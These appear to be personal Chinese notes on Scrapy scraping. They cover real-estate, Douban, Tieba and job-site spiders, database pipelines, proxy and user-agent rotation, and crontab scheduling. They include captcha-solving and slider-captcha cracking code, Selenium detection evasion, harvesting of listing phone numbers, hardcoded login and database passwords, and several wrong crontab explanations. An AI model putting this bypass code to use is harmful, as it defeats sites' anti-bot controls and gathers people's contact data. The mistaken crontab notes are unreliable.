# 如果有province_text,保存起来
if province_text:
province = province_text
# 不爬取海外信息
if province == "其它":
continue
city_td = td_list[1]
city_links = city_td.xpath(".//a")
for city_link in city_links:
# 城市名
city = city_link.xpath(".//text()").get()
# 城市名对应的url
city_url = city_link.xpath(".//@href").get()
# print("省份", province)
# print("城市", city)
# print("城市链接", city_url)
# 北京新房、二手房url、租房例外
if "bj" in city_url:
newhouse_url = "https://newhouse.fang.com/house/s/"
esf_url = "https://esf.fang.com/"
rent_url = "https://zu.fang.com/"
else:
# 构建新房的url链接
newhouse_url = city_url.split(".")[0] + ".newhouse.fang.com/house/s/"
# 构建二手房的url链接
esf_url = city_url.split(".")[0] + ".esf.fang.com/"
# 构建租房url链接
rent_url = city_url.split(".")[0] + ".zu.fang.com/"
# print("新房", newhouse_url)
# print("二手房", esf_url)
yield scrapy.Request(
url=newhouse_url,
callback=self.parse_newhouse,
meta={"item": (province, city)}
)
yield scrapy.Request(
url=esf_url,
callback=self.parse_esf,
meta={"item": (province, city)}
)
yield scrapy.Request(
url=rent_url,
callback=self.parse_rent,
meta={'item':(province, city)}
)
# 解析新房列表页
def parse_newhouse(self, response):
print(response.request.headers['User-Agent'])
province, city = response.meta.get("item")
li_list = response.xpath("//div[contains(@class,'nl_con')]/ul/li")
try:
for li in li_list:
name = li.xpath(".//div[@class='nlcd_name']/a/text()").get()
if name is not None: # 页面有广告
name = name.strip()
house_tpye_list = li.xpath(".//div[contains(@class,'house_type')]/a/text()").getall()
rooms = list(map(lambda x: re.sub(r"\s|/|-", "", x), house_tpye_list))
rooms = "".join(rooms)
area = "".join(li.xpath(".//div[contains(@class,'house_type')]/text()").getall()) # 列表转化字符串
area = re.sub(r"\s|/|-", "", area)
district_text = "".join(li.xpath(".//div[@class='address']/a//text()").getall())
district = re.search(r".*\[(.+)\].*", district_text)
if district is not None:
district = district.group(1)
address = li.xpath(".//div[@class='address']/a/@title").get()
sale = li.xpath(".//div[contains(@class,'fangyuan')]/span/text()").get()
price = "".join(li.xpath(".//div[@class='nhouse_price']//text()").getall())
price = re.sub(r"\s|广告", "", price)
origin_url = "http:" + li.xpath(".//div[@class='nlcd_name']/a/@href").get()
tel = "".join(li.xpath(".//div[@class='tel']//text()").getall()).strip()
item = NewHouseItem(province=province, city=city, name=name, rooms=rooms,
area=area, district=district, address=address, sale=sale,
price=price, origin_url=origin_url, tel=tel)
yield item
except Exception as e:
log.ERROR(e)
# 下一页
next_url = response.xpath("//div[@class='page']//a[@class='next']/@href").get()
yield scrapy.Request(url=response.urljoin(next_url), callback=self.parse_newhouse,
meta={"item": (province, city)})
# 解析二手房列表页
def parse_esf(self, response):
print(response.request.headers['User-Agent'])
province, city = response.meta.get("item")
dl_list = response.xpath("//div[contains(@class,'shop_list')]/dl")
try:
for dl in dl_list:
item = ESFHouseItem(province=province, city=city)
name = dl.xpath(".//p[@class='add_shop']/a/@title").get()
item['name'] = name
if name is not None: # 页面有广告
info_list = dl.xpath(".//p[@class='tel_shop']/text()").getall()
info_list = list(map(lambda x: re.sub(r"\s", "", x), info_list))
# print(info_list) # ['4室2厅', '133.84㎡', '高层(共16层)', '南北向', '2003年建', '']
for info in info_list:
if "厅" in info:
item['rooms'] = info
elif "㎡" in info:
item['area'] = info
elif "层" in info:
item["floor"] = info
elif "向" in info:
item['toward'] = info
elif "建" in info:
item["year"] = info
item['address'] = ''.join(dl.xpath(".//p[@class='add_shop']/span/text()").getall())
price = dl.xpath(".//dd[@class='price_right']/span//text()").getall()
# 总价
item['price'] = price[0] + price[1]
# 单价
item['unit'] = price[-1]
origin_url = dl.xpath(".//h4[@class='clearfix']/a/@href").get()
# /chushou/3_244089396.htm
item['origin_url'] = response.urljoin(origin_url)
# 获取详情页电话
yield scrapy.Request(url=item['origin_url'], callback=self.parse_esf_detail, meta={'item': item})
except Exception as e:
log.ERROR(e)
# 下一页
next_url = response.xpath("//a[text()='下一页']/@href").get()
if next_url is not None:
yield scrapy.Request(
url=response.urljoin(next_url),
callback=self.parse_esf,
meta={"item": (province, city)}
)
# 解析二手房详情页
def parse_esf_detail(self, response):
item = response.meta.get('item')
item['tel'] = response.xpath("//span[@id='mobilecode']/text()").get()
yield item
# 解析租房列表
def parse_rent(self, response):
print(response.request.headers['User-Agent'])
province, city = response.meta.get("item")
rent_detail_url_list = response.xpath("//p[@class='title']/a/@href").getall()
rent_detail_url_list = list(map(lambda x: response.urljoin(x), rent_detail_url_list))
for rent_detail_url in rent_detail_url_list:
yield scrapy.Request(
url=rent_detail_url,
callback=self.parse_rent_detail,
meta={"item": (province, city)}
)
# 下一页
next_url = response.xpath("//a[text()='下一页']/@href").get()
if next_url is not None:
yield scrapy.Request(url=response.urljoin(next_url),
callback=self.parse_esf,
meta={"item": (province, city)}
)
# 解析租房详情页
def parse_rent_detail(self, response):
province, city = response.meta.get("item")
item = RentHouseItem(province=province, city=city)
try:
price = response.xpath("//div[contains(@class,'trl-item sty1')]//text()").getall()
item['price'] = ''.join(list(map(lambda x:re.sub(r'\s', '', x), price)))
rent_toward_list = response.xpath("//div[@class='trl-item1 w146']/div[@class='tt']/text()").getall()
item['rent_method'] = rent_toward_list[0] if len(rent_toward_list)>0 else None
item['toward'] = rent_toward_list[1] if len(rent_toward_list)>1 else None
rooms_floor_list = response.xpath("//div[@class='trl-item1 w182']/div[@class='tt']/text()").getall()
item['rooms'] = rooms_floor_list[0] if len(rooms_floor_list)>0 else None
item['floor'] = rooms_floor_list[1] if len(rooms_floor_list)>1 else None
area_decoration_list = response.xpath("//div[@class='trl-item1 w132']/div[@class='tt']/text()").getall()
item['area'] = area_decoration_list[0] if len(area_decoration_list)>0 else None
item['decoration'] = area_decoration_list[1] if len(area_decoration_list)>1 else None
address_list = response.xpath("//div[contains(@class,'rcont')]//text()").getall()
item['address'] = ''.join(list(map(lambda x:re.sub(r'\s', '', x), address_list)))
item['origin_url'] = response.url
# tel = response.xpath("//div[@class='tjcont-jjr-line2 clearfix']/text()").get()
# if tel:
# item['tel'] = tel.strip()
# else:
# item['tel'] = tel
tel = response.xpath("//div[@class='trlcont rel']//text()").getall()
item['tel'] = None
for i in tel:
if re.findall(r'\d{11}', i):
item['tel'] = i.strip()
# print(item)
yield item
except Exception as e:
log.ERROR(e)
~~~
pipeline.py 保存json文件
~~~python
import re
from scrapy.exporters import JsonLinesItemExporter
class YangguangPipeline(object):
def __init__(self):
self.fp = open("yangguang.json", "wb") # start_exporting() 是以二进制方式写入的write(b"[")
self.exporter = JsonLinesItemExporter(self.fp, ensure_ascii=False, encoding="utf-8")
def open_spider(self, spider): # 当爬虫被打开的是时候执行
print("这是爬虫开始了...")
def process_item(self, item, spider): # 当爬虫有item传过来的时候会被调用
item["content"] = self.process_content(item["content"])
print(item)
self.exporter.export_item(item)
return item
def process_content(self, content):
content = [re.sub(r"\xa0|\s", "", i) for i in content]
content = [i for i in content if len(i) > 0] # 去除列表中的空字符串
return content
def close_spider(self, spider): # 当爬虫关闭的时候执行
self.fp.close()
print("这是爬虫结束了。。。")
~~~
pipeline.py 分表存储,twisted异步保存到数据库
~~~python
from datetime import datetime
from fangtianxia.items import NewHouseItem, ESFHouseItem, RentHouseItem
from pymysql import cursors
from twisted.enterprise import adbapi
class FangtianxiaTwistedPipeline(object):
"""异步保存到数据库"""
def __init__(self):
dbparams = {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': 'mysql123',
'database': 'fangtianxia',
'charset': 'utf8',
'cursorclass': cursors.DictCursor
}
self.dbpool = adbapi.ConnectionPool('pymysql', **dbparams)
self._sql = None
@property
def sql(self):
if not self._sql:
self._sql = """
insert into newhouse(id,province,city,name,rooms,area,price,address,district,sale,origin_url,tel,crawl_time)
values (null,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)
"""
return self._sql
return self._sql
def process_item(self, item, spider):
"""分表保存"""
if isinstance(item, NewHouseItem):
# runInteraction将同步转化为异步处理
defer = self.dbpool.runInteraction(self.insert_item_newhouse, item)
# 错误处理
defer.addErrback(self.handle_error, item, spider)
if isinstance(item, ESFHouseItem):
defer = self.dbpool.runInteraction(self.insert_item_esfhouse, item)
defer.addErrback(self.handle_error, item, spider)
if isinstance(item, RentHouseItem):
defer = self.dbpool.runInteraction(self.insert_item_renthouse, item)
defer.addErrback(self.handle_error, item, spider)
def insert_item_newhouse(self, cursor, item):
"""保存新房数据到MySQL"""
crawl_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
cursor.execute(
self.sql,
(item.get('province'), item.get('city'), item.get('name'), item.get('rooms'),
item.get('area'), item.get('price'), item.get('address'), item.get('district'),
item.get('sale'), item.get('origin_url'), item.get('tel'), crawl_time)
)
def insert_item_esfhouse(self, cursor, item):
"""保存二手房数据到MySQL"""
crawl_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
sql_esfhouse = "insert into esfhouse(id,province,city,name,rooms,floor,toward,year,address,area,price,unit,origin_url,tel,crawl_time) values (null,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
cursor.execute(
sql_esfhouse,
(item.get('province'), item.get('city'), item.get('name'), item.get('rooms'),
item.get('floor'), item.get('toward'), item.get('year'), item.get('address'),
item.get('area'), item.get('price'), item.get('unit'), item.get('origin_url'),
item.get('tel'), crawl_time)
)
def insert_item_renthouse(self, cursor, item):
"""保存租房数据到MySQL"""
crawl_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
sql_renthouse = "insert into renthouse(id, province, city, decoration, floor, price, area, rent_method, address, rooms, toward, origin_url, tel, crawl_time) value (null, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
cursor.execute(
sql_renthouse,
(item.get('province'), item.get('city'), item.get('decoration'), item.get('floor'),
item.get('price'), item.get('area'), item.get('rent_method'), item.get('address'),
item.get('rooms'), item.get('toward'), item.get('origin_url'),
item.get('tel'), crawl_time)
)
def handle_error(self, error, item, spider):
print("=" * 20 + "error" + "=" * 20)
print(error)
print("=" * 20 + "error" + "=" * 20)
~~~
middleware.py 处理useragent和proxy
~~~python
import redis
import requests
from scrapy import signals
from fake_useragent import UserAgent
class RandomUserAgent(object):
"""随机useragent"""
def process_request(self, request, spider):
user_agent = UserAgent()
request.headers['User-Agent'] = user_agent.random
class IPProxyMiddleware(object):
"""获取随机代理"""
def process_request(self, request, spider):
if 'proxy' not in request.meta:
proxy = self.get_proxy_from_redis()
print(f"this is request ip:{proxy}")
def process_response(self, request, response, spider):
if response.status != 200:
proxy = self.get_proxy_from_redis()
print(f"this is response ip:{proxy}")
request.meta['proxy'] = 'https://' + proxy
return request
return response
def get_proxy(self):
"""随机从代理池中读取proxy"""
PROXY_POOL_URL = 'http://localhost:5555/random'
try:
response = requests.get(PROXY_POOL_URL)
if response.status_code == 200:
return response.text
except Exception as e:
print('Proxy_pool connect filed',e)
return None
def get_proxy_from_redis(self):
"""从redis中读取随机代理"""
redis_connection = redis.Redis(host='localhost',port=6379,db=0)
try:
proxy = redis_connection.srandmember('proxy_pool')
# print(proxy)
return proxy.decode()
except Exception as e:
print('Proxy_pool connect filed', e)
return None
~~~
settings.py 基本设置
~~~python
ROBOTSTXT_OBEY = False
LOG_LEVER = "WARNING"
LOG_FILE = "info.log"
# 确保所有爬虫共享相同的去重指纹
DUPEFILTER_CLASS = "scrapy_redis.dupefilter.RFPDupeFilter"
# 确保request存储到redis中
SCHEDULER = "scrapy_redis.scheduler.Scheduler"
# 在redis中保持scrapy-redis用到的队列,不会清理redis中的队列,从而可以实现暂停和恢复的功能
SCHEDULER_PERSIST = True
# 设置链接redis信息
REDIS_URL = "redis://127.0.0.1:6379/0"
# scrapy-redis-bloomfilter
# DUPEFILTER_CLASS =”scrapy_redis_bloomfilter.dupefilter.RFPDupeFilter"
# 散列函数的个数,默认为6,可以自行修改
BLOOMFILTER_HASH_NUMBER = 6
# Bloom Filter的bit参数,默认30,占用128MB空间,去重量级1亿
BLOOMFILTER_BIT = 30
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en',
'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'
}
DOWNLOADER_MIDDLEWARES = {
# 'fangtianxia.middlewares.FangtianxiaDownloaderMiddleware': 543,
'fangtianxia.middlewares.RandomUserAgent': 540,
'fangtianxia.middlewares.IPProxyMiddleware': 541,
}
ITEM_PIPELINES = {
'fangtianxia.pipelines.FangtianxiaTwistedPipeline': 300,
}
~~~
# 11. scrapy_login
~~~python
# -*- coding: utf-8 -*-
import scrapy
import re
from urllib import request
from PIL import Image
from yundama import identify
import requests
class DoubanSpider(scrapy.Spider):
name = 'douban'
allowed_domains = ['douban.com']
start_urls = ['https://accounts.douban.com/login']
login_url = 'https://accounts.douban.com/login'
profile_url = 'https://www.douban.com/people/187541834/'
edit_signature_url = 'https://www.douban.com/j/people/187541834/edit_signature'
def parse(self, response):
formdata = {
'source': 'None',
'redir': 'https://www.douban.com/',
'form_email': 'aircov@163.com',
'form_password': 'douban123456',
'remember': 'on',
'login': '登录'
}
# 验证码url
captcha_url = response.xpath("//img[@id='captcha_image']/@src").get()
# print("*"*50)
# print(captcha_img)
if captcha_url:
captcha = self.recognize_captcha(captcha_url)
formdata["captcha-solution"] = captcha
captcha_id = response.xpath("//input[@name='captcha-id']/@value").get()
formdata["captcha-id"] = captcha_id
print(formdata)
yield scrapy.FormRequest(
url=self.login_url,
formdata=formdata,
callback=self.after_login
)
# 登录成功,豆瓣主页面
def after_login(self, response):
if response.url == 'https://www.douban.com/':
print("登录成功!")
yield scrapy.Request(
self.profile_url,
callback=self.parse_profile
)
else:
print("登录失败!")
print(re.findall(r"这是我自己修改的", response.body.decode("utf-8")))
# 个人主页
def parse_profile(self,response):
if response.url == 'https://www.douban.com/people/187541834/':
print("进入到了个人主页!")
# <input type="hidden" name="ck" value="Xdd_" disabled="">
ck = response.xpath("//input[@name='ck']/@value").get()
# 构造form表单,发送请求,修改签名
formdata = {
"ck":ck,
"signature":"我就是我,不一样的烟火~~"
}
yield scrapy.FormRequest(
self.edit_signature_url,
callback=self.parse_none,
formdata=formdata
)
print("修改签名成功。。。")
else:
print("没有进入个人主页!")
# 发送请求没有加上callback= 会自动执行这个def parse(self, response):函数
def parse_none(self,response):
pass
# 调用打码平台识别验证码
def recognize_captcha(self, img_url):
request.urlretrieve(img_url, "captcha.png") # 保存图片到本地
captcha_content = requests.get(img_url).content # 请求验证码地址 获取响应
captcha_code = identify(captcha_content) # 调用打码平台
print("验证码的识别结果为:%s" % captcha_code)
return captcha_code
~~~
next_url = urllib.parse.urljoin(response.url, next_url) 自动补全url地址
```
yield scrapy.Request(url=response.urljoin(next_url), callback=self.parse_newhouse,
meta={"item": (province, city)})
```
~~~python
# -*- coding: utf-8 -*-
import scrapy
import urllib
import requests
from tieba.items import TiebaItem
import re
class TbSpider(scrapy.Spider):
name = 'tb'
allowed_domains = ['tieba.baidu.com']
start_urls = ['https://tieba.baidu.com/f?ie=utf-8&kw=%E6%9D%8E%E6%AF%85&fr=search&pn=0&']
def parse(self, response):
# 根据帖子进行分组
div_list = response.xpath("//div[contains(@class, 'i')]")
for div in div_list:
item = TiebaItem()
item["href"] = div.xpath("./a/@href").get()
item["title"] = div.xpath("./a/text()").get()
item["img_list"] = []
if item["href"] is not None:
# 自动将url地址补充完整
item["href"] = urllib.parse.urljoin(response.url, item["href"])
# print(item)
yield scrapy.Request(
item["href"],
callback=self.parse_detail_url,
meta={"item": item}
)
# 列表页de翻页
next_url = response.xpath("//a[text()='下一页']/@href").get()
if next_url is not None:
next_url = urllib.parse.urljoin(response.url, next_url)
yield scrapy.Request(
next_url,
callback=self.parse,
)
def parse_detail_url(self,response): # 处理详情页
item = response.meta["item"]
# if "img_list" not in item:
# item["img_list"] = re.findall(r'<a href="(http://c\.hiphotos\.baidu\.com/forum/.*?)">.*?</a>',response.body.decode("utf-8"))
# else:
# <a href="http://c.hiphotos.baidu.com/forum/w%3D400%3Bq%3D80%3Bg%3D0/sign=f5e39e97...c.jpg">图</a>
try:
item["img_list"].extend(re.findall(r'<a href="(http://c\.hiphotos\.baidu\.com/forum/.*?)">.*?</a>',response.body.decode("utf-8")))
except Exception as e:
print("%s:%s" % (e,response.url))
next_url = response.xpath("//a[text()='下一页']/@href").get()
if next_url is not None: # 表示有下一页
next_url = urllib.parse.urljoin(response.url, next_url)
yield scrapy.Request(
next_url,
callback=self.parse_detail_url,
meta={"item": item}
)
else:
# URL地址解码requests.utils.unquote(i)
item["img_list"] = [requests.utils.unquote(i).split("src=")[-1].strip() for i in item["img_list"]]
# print(item)
yield item
~~~
# 12. xpath总结
`//div[@class='xxx']/ul/li[not(@clsas)]/span/a/text()`没有class属性的li标签
`//div[contains(@class,'xxx')]/span[last()]/a/text()`class中包含‘xxx’的div下的最后一个span
`//a[text()='下一页']/@href` 文本等于“下一页”的a标签
# 13.python时间序列处理
```python
crawl_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
```
# 14 redis 实现增量爬取,断点续爬
scrapy setting.py中设置
```python
# 确保所有爬虫共享相同的去重指纹
DUPEFILTER_CLASS = "scrapy_redis.dupefilter.RFPDupeFilter"
# 确保request存储到redis中
SCHEDULER = "scrapy_redis.scheduler.Scheduler"
# 在redis中保持scrapy-redis用到的队列,不会清理redis中的队列,从而可以实现暂停和恢复的功能
SCHEDULER_PERSIST = True
# 设置链接redis信息
REDIS_URL = "redis://47.102.99.199:6379/2"
```
# 15 随机user-agent设置
middleware.py中设置
```python
class KuanspiderDownloaderMiddleware(object):
......
def process_request(self, request, spider):
"""设置随机请求头"""
ua = UserAgent()
request.headers['User-Agent'] = ua.random
```
查看user-agent
```python
class KuanSpider(scrapy.Spider):
......
def parse(self, response):
print(response.request.headers["User-Agent"])
```
# 16 保存文件,图片
~~~python
def save_content_list(self, content_list):
with open("douyu_anchor.json", "w", encoding="utf-8") as f:
for content in content_list:
f.write(json.dumps(content, ensure_ascii=False) + "\n")
~~~
```python
import os
from urllib import request
item = {
'title':category,
'image':image_url
}
file_path = './img/'+item['title']
if not os.path.exists(file_path):
os.mkdir(file_path)
if not os.path.exists(file_path+item['image']):
request.urlretrieve(item['image'], file_path+item['image'])
```
# 17. urlencode url地址参数补全
~~~python
def get_page_index(keyword, city_code, offset):
data = {
'query': keyword,
'scity': city_code,
'page': offset,
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
}
proxies = {
'http': 'http://127.0.0.1:8087',
'https': 'https://127.0.0.1:8087'
}
url = 'https://www.zhipin.com/job_detail/?' + urlencode(data)
try:
urllib3.disable_warnings()
res = requests.get(url, headers=headers)
if res.status_code == 200:
return res.text
elif requests.get(url, headers=headers, proxies=proxies, verify=False).status_code == 200:
res1 = requests.get(url, headers=headers, proxies=proxies, verify=False)
return res1.text
return None
except RequestException:
print('请求初始页出错')
return None
~~~
# 18. MySQL去重操作
```mysql
--查询单个字段重复数据
select name from films group by name having count(*)>1;
--查询多个字段的重复数据,并将结果的所有字段信息返回
select * from films where(films.name,films.box_office) in (select name,box_office from films group by name,box_office having count(*)>1);
--删除 table 中重复数据.
# 1.查询出重复记录形成一个集合(临时表t2),集合里是每种重复记录的最小ID。
# 2.关联 判断重复基准的字段。
# 3.根据条件,删除原表中id大于t2中id的记录
delete films form films,(select min(id) id,name,released from films group by name,released having count(*)>1) t2 where films.name = t2.name and films.released = t2.released and films.id>t2.id;
```
# 19. logging模块使用/scrapy.log使用
```python
log_name = 'sb_spider_log.log'
logging.basicConfig( # 日志输出信息
filename=log_name,
filemode='a',
level=logging.INFO,
datefmt='%Y-%m-%d %A %H:%M:%S')
......
logging.info('Page crawling succeeded')
logging.error()
```
~~~python
# LOG_LEVER = "INFO"
# LOG_FILE = "info.log"
from scrapy import log
......
log.error(e)
~~~
# 20. python3爬虫中文乱码之请求头 ‘Accept-Encoding’:br 的问题
‘Accept-Encoding’:是浏览器发给服务器,声明浏览器支持的编码类型。一般有gzip,deflate,br 等等。
python3中的 requests包中response.text 和 response.content
response.content #字节方式的响应体,会自动为你解码 gzip 和 deflate 压缩 类型:bytes
reponse.text #字符串方式的响应体,会自动根据响应头部的字符编码进行解码。类型:str
但是这里是默认是不支持解码br的!!!!
br 指的是 Brotli,是一种全新的数据格式,无损压缩,压缩比极高(比gzip高的)
~~~python
import brotli
# 获取网页内容,返回html数据
response = requests.get(url, headers=headers)
# 通过状态码判断是否获取成功
if response.status_code == 200:
print(response.headers)
print(response.encoding)
key = 'Content-Encoding'
if(key in response.headers and response.headers['Content-Encoding'] == 'br'):
data = brotli.decompress(response.content)
data1 = data.decode('utf-8')
print(data1)
~~~
# 21. requests获取cookies
~~~python
user_id = re.search(r'"uniqueid":"(\d+)"', user_info).group(1)
print(user_id)
url = 'https://weibo.com/u/{}/home'.format(user_id)
response = self.sess.get(url)
# <class 'requests.structures.CaseInsensitiveDict'> 转化成字典
cookies = dict(response.request.headers)
with open('./cookies.txt','w') as f:
f.write(cookies['Cookie'])
~~~
# 22. 滑动验证码破解
~~~python
import cv2
import time
import requests
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from PIL import Image
from io import BytesIO
import numpy as np
from config import username, password
class Login163(object):
"""
使用opencv识别验证码中缺口位置,获取需要滑动距离,并使用selenium模仿人类行为破解滑动验证码
"""
def __init__(self, username=None, password=None):
self.username = username
self.password = password
self.driver = webdriver.Chrome()
self.driver.set_window_size(1280, 900)
self.wait = WebDriverWait(self.driver, 20)
self.url = 'https://dl.reg.163.com/ydzj/maildl?product=urs&curl=https://m.reg.163.com/'
self.zoom = 1
def get_pic(self):
"""获取图片"""
target = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'yidun_bg-img'))).get_attribute('src')
template = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'yidun_jigsaw'))).get_attribute('src')
target_img = Image.open(BytesIO(requests.get(target).content))
template_img = Image.open(BytesIO(requests.get(template).content))
target_img.save('target.jpg')
template_img.save('template.png')
local_img = Image.open('target.jpg')
size_loc = local_img.size
self.zoom = 391 / int(size_loc[0]) # 缩放系数为391除以本地的宽度,391为目标图片在网页上的宽度
print('self.zoom:', self.zoom)
def match(self, target, template):
img_rgb = cv2.imread(target)
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
template = cv2.imread(template, 0)
run = 1
w, h = template.shape[::-1]
print(w, h)
res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
# 使用二分法查找阈值的精确值
L = 0
R = 1
while run < 20:
run += 1
threshold = (R + L) / 2
print(threshold)
if threshold < 0:
print('Error')
return None
loc = np.where(res >= threshold)
print(len(loc[1]))
if len(loc[1]) > 1:
L += (R - L) / 2
elif len(loc[1]) == 1:
print('目标区域起点x坐标为:%d' % loc[1][0])
break
elif len(loc[1]) < 1:
R -= (R - L) / 2
return loc[1][0]
def get_tracks(self, distance):
"""
根据偏移量获取移动轨迹
:param distance: 偏移量
:return: 移动轨迹
"""
distance += 20
print('distance:', distance)
v = 0
t = 0.2
forward_tracks = []
current = 0
mid = distance * 3 / 5
while current < distance:
if current < mid:
a = 2
else:
a = -3
s = v * t + 0.5 * a * (t ** 2)
v = v + a * t
current += s
forward_tracks.append(round(s))
back_tracks = [-3, -3, -2, -2, -2, -2, -2, -1, -1, -1]
return {'forward_tracks': forward_tracks, 'back_tracks': back_tracks}
def crack_slider(self):
self.get_pic()
target = 'target.jpg'
template = 'template.png'
distance = self.match(target, template)
tracks = self.get_tracks((distance + 18) * self.zoom) # 对位移的缩放计算 18需要自己调整
print('tracks', tracks)
slider = self.driver.find_element_by_class_name("yidun_slider") # 需要滑动的元素
ActionChains(self.driver).click_and_hold(slider).perform() # 鼠标按住左键不放
for track in tracks['forward_tracks']:
ActionChains(self.driver).move_by_offset(xoffset=track, yoffset=0).perform()
time.sleep(0.5)
for back_tracks in tracks['back_tracks']:
ActionChains(self.driver).move_by_offset(xoffset=back_tracks, yoffset=0).perform()
ActionChains(self.driver).move_by_offset(xoffset=-3, yoffset=0).perform()
ActionChains(self.driver).move_by_offset(xoffset=3, yoffset=0).perform()
time.sleep(1)
ActionChains(self.driver).release().perform() # 释放鼠标
time.sleep(1)
self.driver.find_element_by_xpath("//div[@class='bButton_btn ']/button").click()
# 重试
try:
failure = WebDriverWait(self.driver, 5).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'yidun_tips__text'), '向右拖动滑块填充拼图'))
print(failure)
except:
failure = None
if failure:
self.crack_slider()
# 错误
try:
error = WebDriverWait(self.driver, 5).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'yidun_tips__text'), '失败过多,点此重试'))
print(error)
except:
error = None
if error:
error.click()
time.sleep(2)
self.crack_slider()
def run(self):
self.driver.get(self.url)
self.driver.find_elements_by_xpath("//div[@class='ipt_wrap large']/input")[0].send_keys(self.username)
self.driver.find_elements_by_xpath("//div[@class='ipt_wrap large']/input")[1].send_keys(self.password)
# 点击登录
self.driver.find_element_by_xpath("//div[@class='u-btn c-main']/button").click()
# 验证机器人行为
try:
robot = WebDriverWait(self.driver, 3).until(EC.presence_of_element_located((By.CLASS_NAME, 'yidun_tips')))
if robot:
print("正在验证机器人行为!")
wait = WebDriverWait(self.driver, 20).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'yidun_tips__text'), '验证成功'))
if wait:
self.driver.find_element_by_xpath("//div[@class='u-btn c-main']/button").click()
except:
pass
# 跳转页面
time.sleep(1)
try:
self.driver.find_element_by_class_name("u-icon-img").click()
time.sleep(2)
except:
pass
# 滑动验证码页面
self.crack_slider()
if self.driver.current_url == 'https://m.reg.163.com/#/email':
cookies = {i["name"]: i["value"] for i in self.driver.get_cookies()}
print(cookies)
print(self.driver.current_url)
# 关闭webdriver
time.sleep(5)
self.driver.close()
if __name__ == '__main__':
username = username
password = password
login163 = Login163(username=username, password=password).run()
~~~
~~~python
def FindPic(target, template):
"""
找出图像中最佳匹配位置
:param target: 目标即背景图
:param template: 模板即需要找到的图
:return: 返回最佳匹配及其最差匹配和对应的坐标
"""
target_rgb = cv2.imread(target)
target_gray = cv2.cvtColor(target_rgb, cv2.COLOR_BGR2GRAY)
template_rgb = cv2.imread(template, 0)
res = cv2.matchTemplate(target_gray, template_rgb, cv2.TM_CCOEFF_NORMED)
value = cv2.minMaxLoc(res)
~~~
使用cv2库,先读取背景图,然后夜视化处理(消除噪点),然后读取模板图片,使用cv2自带图片识别找到模板在背景图中的位置,使用minMaxLoc提取出最佳匹配的最大值和最小值,返回一个数组形如(-0.3, 0.95, (121,54),(45, 543))元组四个元素,分别是最小匹配概率、最大匹配概率,最小匹配概率对应坐标,最大匹配概率对应坐标。
我们需要的是最大匹配概率坐标,对应的分别是x和y坐标,但是这个不一定,有些时候可能是最小匹配概率坐标,最好是根据概率的绝对值大小来比较。
滑块验证较为核心的两步,第一步是找出缺口距离,第二步是生成轨迹并滑动,较为复杂的情况下还要考虑初始模板图片在背景图中的坐标,以及模板图片透明边缘的宽度,这些都是影响轨迹的因素。
# 23. scrapy 使用selenium
~~~python
class SeleniumDownloadMiddleware(object):
def __init__(self):
self.driver = webdriver.Chrome()
def process_request(self, request, spider):
self.driver.get(request.url)
time.sleep(1)
try:
while True:
showmore = self.driver.find_element_by_class_name('show-more')
showmore.click()
time.sleep(0.3)
if not showmore:
break
except:
pass
# 获得网页源代码,异步,需要延迟 阅读、评论、喜欢三个字段ajax请求,在网页中直接通过xpath不可
source = self.driver.page_source
response = HtmlResponse(url=self.driver.current_url, body=source, request=request, encoding="utf-8")
return response
~~~
# 24. scrapy部署
1. 在scrapy项目路径下执行`sudo scrapyd`或`scrapyd`,启动scrapyd服务;或以后台进程方式启动`nohup scrapyd > scrapyd.log 2>&1 &`
1. 2表示标准错误输出
2. 1表示标准信息输出
3. 2>&1表示把错误信息一起输入到标准输出
2. 部署scrapy爬虫项目`scrapyd-deploy deployname -p myspider`
3. 启动爬虫项目中的一个爬虫`curl http://localhost:6800/schedule.json -d project=myspider -d spider=tencent`
4. 终止爬虫`curl http://localhost:6800/cancle.json -d project=myspider -d job=tencent`(kill-9 `ps-aux | grep 'myspider'| awk '{print "kill-9"$2}' | sh`)
listproject.json -- 列出项目 listjobs.json -- 列出job listspiders.json -- 列出爬虫
# 25.selenium封杀
~~~js
window.navigator.webdriver
selenium:true
chrome:undefined
~~~
解决方法:
~~~python
from selenium.webdriver import Chrome
from selenium.webdriver import ChromeOptions
option = ChromeOptions()
# 设置无头浏览器方法
# options.set_headless()
# options.headless = True
option.add_experimental_option('excludeSwitches', ['enable-automation'])
driver = Chrome(options=option)
~~~
此时启动的Chrome窗口,在右上角会弹出一个提示,不用管它,不要点击`停用`按钮。
# 26. crontab定时任务
1.编辑任务 crontab -e
任务格式
分 时 日 月 星期 命令
m h d m week command
30 * * * * ls 每月8号7点半执行ls命令
* */5 * * * ls 每隔3分钟执行 ls命令
注意点:
星期0;指的是星期天
* 代表每
*/n 代表隔
2.查看任务 crontab -l
定时爬虫操作
终端命令 进入项目
1. 在爬虫项目中 创建 .sh文件
2. 在.sh文件中 写执行命令
cd `dirname $0` || exit 1
python ./main.py >> run.log 2>&1
3. 添加可执行权限 sudo chmod +x run.sh
4. crontab -e
5. */5 * * * * /home/ubuntu/..../myspider.sh >> /home/ubuntu/.../run2.log 2>&1
